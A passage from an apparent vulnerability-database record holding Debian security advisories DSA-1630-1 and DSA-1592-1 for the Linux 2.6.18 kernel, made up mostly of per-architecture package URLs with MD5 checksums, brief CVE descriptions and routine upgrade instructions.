Size/MD5 checksum: 3351164 f15965863479e2b0eab136c912b25ebd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 183690 e20c71f57188bc8458abb4dc212402f3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 156886 65c9aec3009d7ace0550bee15d0bd34c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 151270 92419bb4255d3989eef1b3d2e616e5a5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 9864388 2aa86c68a6c8ac36e8dc22aafcac34fb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 183862 262a4f1a05c00b6c2752733101d2bb4b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 6030536 1199eb8f7b6a9b4ff1a32ebccfcd7074\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 5944692 205d02fd233142d8058874e6ead00e94\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 156854 1f02416baf0082238418bba97eb8aa4f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 15028044 00f2ad06dfa6c908036349c35a5a8e39\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 55154 6b6f4c17287d5e053d716a742cb738a0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 179462 e5497abf20a5461319d8f1d7c37d19b3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 15057484 ea8ab2c273fbc3d282d0120cdbbe5c34\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 55208 f3bfa65fa08c4ad552aef1536bdd1fcc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-22etch2_mipsel.deb\n Size/MD5 checksum: 5928064 cad7b6b3653d205a39e876a508d4ddaf\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_powerpc.deb\n Size/MD5 checksum: 3367890 ad1ad713d488f9e0e0669e1293f1ccd3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 254026 ae831a11ed61a4b52bb7a3043eb2f265\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 16628466 1b10ecc3a4095b9f0e9cd6fa0c544308\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 3415704 ea230f1f09a4e8341e7bb24ebd037dd3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 15160062 e41656dd2782d44ec9487138dc694722\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 17017000 04153c3611b94ae5044868407f1eaa96\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 255324 60960ac1262f6d8eabcd96d9789b27bc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 253678 e1a1fcc0865698fca0aa46cc02c0e38d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 18295838 01cb70246fc9027dc9097964d0a7c06d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 253858 a30720b97122274208888b564c0548b5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 18354880 c82075e19802e915551cd25b04f72c76\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 3393390 246ebdc0ce319ab1b8c0022b1b69fd1d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 246546 855a95e124dcd81d26d06fced8ff9cda\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 16406142 59c2543679159905e0d16445d7f5b66d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 231148 96bb009cbc3c1c9fc00a4f84a4aa9cd5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 55156 94c052eb19ce469aabc0a9a71860f861\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 16971942 c230eb342210e9f9376783e013216695\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 252866 4b2bf2f6783bb456b5c003df3e1ea1f5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\n Size/MD5 checksum: 55206 209887bf65d555135cde2cb7b1ef0b7b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 55168 ba80b3fe0aa1ffdc92825578c4a0a8e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 5620988 555c4bd0a4b245f267dc324c9b39d695\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 144604 bd539fa6955b9ea80a38046b1097ea6e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 145888 80f3dcbc19b2076e6a37ac8f48f1c687\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 5403802 9bfc6e49de7faecc3ae013efd8a5ff85\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 2944158 7a37040db97a3a43817eea570ca29554\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 5663004 f3b7384004cd0c0c6a0478865300b9f8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 55146 fd4df49a7d2116c1b1eb0f38211c196c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 145096 7e0bfcc155246d4b7cb8ee00d9a370ba\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 1440072 437e3a46bda63f1ba5bb2d0b970a669f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_s390.deb\n Size/MD5 checksum: 2967228 a32e5147c0f741a5300c6122aade4377\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 10394174 30c3164de023288678eda955e7088e89\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 166138 da9c686e82839dbecfc4d2f8d5d6ff8f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 6412488 738092d091284463d88dcce9bc0d683e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 10694332 aa5d657822ad30eb7edf2eca35644e09\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 196630 b349a6dd56888b772577075f21229498\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 195534 c7b2e3ee30ba33f0a207fa11a5f08916\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 197330 5e9f1ad14b5b10c6012b09dcfa93acb5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 10647804 5bab66c5cdaa22683425b4e101fea4e0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 55156 da09f09d5c47ce3cd8666b7ba98b9a08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 3191596 f6aee8879affc350feb8706cdffb95da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 3169298 a6ad7bd3b6ba9d573f47c21f45b9f660\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-22etch2_sparc.deb\n Size/MD5 checksum: 55184 322a273cbddb53db9fdb143229104384\n\n These changes will probably be included in the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2008-08-21T16:40:28", "published": "2008-08-21T16:40:28", "id": "DEBIAN:DSA-1630-1:8E4BC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00216.html", "title": "[SECURITY] [DSA 1630-1] New Linux 2.6.18 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-2358", "CVE-2008-1673"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ----------------------------------------------------------------------\r\nDebian Security Advisory DSA-1592-1 security@debian.org\r\nhttp://www.debian.org/security/ dann frazier\r\nJun 09, 2008 http://www.debian.org/security/faq\r\n- ----------------------------------------------------------------------\r\n\r\nPackage : linux-2.6\r\nVulnerability : heap overflow\r\nProblem type : local/remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1673 CVE-2008-2358\r\n\r\nTwo vulnerabilities have been discovered in the Linux kernel that may\r\nlead to a denial of service or arbitrary code execution. The Common\r\nVulnerabilities and Exposures project identifies the following\r\nproblems:\r\n\r\nCVE-2008-1673\r\n\r\n Wei Wang from McAfee reported a potential heap overflow in the\r\n ASN.1 decode code that is used by the SNMP NAT and CIFS\r\n subsystem. Exploitation of this issue may lead to arbitrary code\r\n execution. This issue is not believed to be exploitable with the\r\n pre-built kernel images provided by Debian, but it might be an\r\n issue for custom images built from the Debian-provided source\r\n package.\r\n\r\nCVE-2008-2358\r\n\r\n Brandon Edwards of McAfee Avert labs discovered an issue in the\r\n DCCP subsystem. Due to missing feature length checks it is possible\r\n to cause an overflow they may result in remote arbitrary code\r\n execution.\r\n\r\nFor the stable distribution (etch), this problem has been fixed in\r\nversion 2.6.18.dfsg.1-18etch6.\r\n\r\nThe linux-2.6/mipsel build was not yet available at the time of this\r\nadvisory. This advisory will be updated when this this build becomes\r\navailable.\r\n\r\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\r\nuser-mode-linux packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nThe following matrix lists additional source packages that were rebuilt for\r\ncompatability with or to take advantage of this update:\r\n\r\n Debian 4.0 (etch)\r\n fai-kernels 1.17+etch.18etch6\r\n user-mode-linux 2.6.18-1um-2etch.18etch6\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390 and sparc.\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.diff.gz\r\n Size/MD5 checksum: 5352776 53665fdbfd435768445f5769815a6f0f\r\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.dsc\r\n Size/MD5 checksum: 892 19fedcf7c50efef11cafccae07e0633e\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.dsc\r\n Size/MD5 checksum: 740 6d352c2fd23224c19ce6bd5f16e426a2\r\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.diff.gz\r\n Size/MD5 checksum: 17450 e69f4b95dd204d627a5f45b1912fb428\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.dsc\r\n Size/MD5 checksum: 5672 ad355fcc4fd43b811ea42d25e453f07b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\r\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.tar.gz\r\n Size/MD5 checksum: 55758 da75950eb5b906da82a0eb14e3df0a24\r\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\r\n Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 3718034 4a0772868c474a21d84a5759109fead8\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 1084558 3339b6103ae3d4b978a2f793b6c7b4a4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 41461134 0b1d8c9944f19c4ab4fe6ba26149724d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 54744 21d56790fe466ad9835168c4200fc83d\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 3589420 9b6d24f908606a6fb80d6ba6d5b162fd\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\r\n Size/MD5 checksum: 1594648 f724461b4b1556f3c95b76bd641d19a0\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 268958 9226e8f3bd1abe6e1f46d83cb3f15c3e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 3052824 0a5d73bd0f62988679f1523345a479a1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 23484706 b3235616663a3f8c5cd74be1971b0426\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 54198 7ad2915af786942a1a198eb5c6d87c81\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 269130 49ffe80d6a37500df13cbb6f354843a8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 23463240 395dade71f4add94b3ce97ae3cbb8bdd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 267564 2743efe9dec46be47c98cdcad485862a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 54234 5a14d927da54bc3f8b2b7c9aeb9fab08\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 268502 2b7595f2a27c437625fbae0f812e8d61\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 23845706 5561732b0f11d84d3b8e46f02e3975e6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 23531908 3cd9327777e15186fcc3149852e73290\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_alpha.deb\r\n Size/MD5 checksum: 3027958 b9764577f6da5b8233db177295abd20f\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 16820986 eb574728014e9904a8b17b79d943f478\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 272278 ace4647a9cab44eba24967ea905ec511\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 3357354 4a27ec48575670343f6849f073bf3fdb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 15261092 cbc252d19e9c5d54d05df350e3982d07\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 271366 1ff138c5b3b035aa0e00e01f9c4f0191\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 3334544 deda30b57daf3beddb8f5761e1437c05\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 3191322 1d05ad81472b0dafdfe1df5d780399fb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 54220 4ecdd29baeeafc951bab081dda4e12ef\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 15272912 76bb3fe952642ad6b49ecd037b3e517d\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_amd64.deb\r\n Size/MD5 checksum: 5961148 cf3882acfa9f901fe84967a9593ecc18\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 1651376 bf5f3e895995733fa3083c9a07e39ea5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 271766 be91f9c886c16307775a5638cebd80c2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 54176 a22f888eb52a941b6c1eeb2bf4bccb78\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 54196 71891fefd6ee2382962b8756df128b4a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 3167972 4ce30d9f1fad078702baaa7834775f69\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 272054 e6c044359f237eab561d4c2a65e13f70\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 1682878 0a59c60af64f405bf651dd07ad5de0f4\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 16859630 89749a4df4d633b398874b93ea578657\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch6_amd64.deb\r\n Size/MD5 checksum: 54190 fe4b179dfd4c055d33503ba23bb136fb\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 203914 3854a7aceff5e5b08d7da9d9c8473eb2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 7566184 3251d12c0787ee663d41b6626fe5a19f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 7924654 72f101e8ff6000295d9a8145784225a3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 239342 268018e4ccd46f7e810a47b39dc79f5b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 8871080 f9f89ad15430fa3ce924cabc61c059a2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 4587380 368ad6bded347af3ecf166a638423a87\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 54270 ea205cdff5f7c47808274f0742cb6601\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 3410570 4cfed14130d8e6ae01e29f43371fd267\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 54224 296297dda91d48b22b5c0792a512a9e2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 234034 756b3be7a0e806fd552088567eebf9b9\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 5009710 65d72981b3071d9beb5702f747c36ee5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 233278 6ae2de0c4b0a4445ac244a0c18ffb81c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch6_arm.deb\r\n Size/MD5 checksum: 199026 a77225b0ad44d3b76b1a713c561a362f\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 197138 d3fc247a0b6c6529c6b83f7e15199b5c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 195994 612e8e99ccd7513b0624aef50d8eb66e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 54200 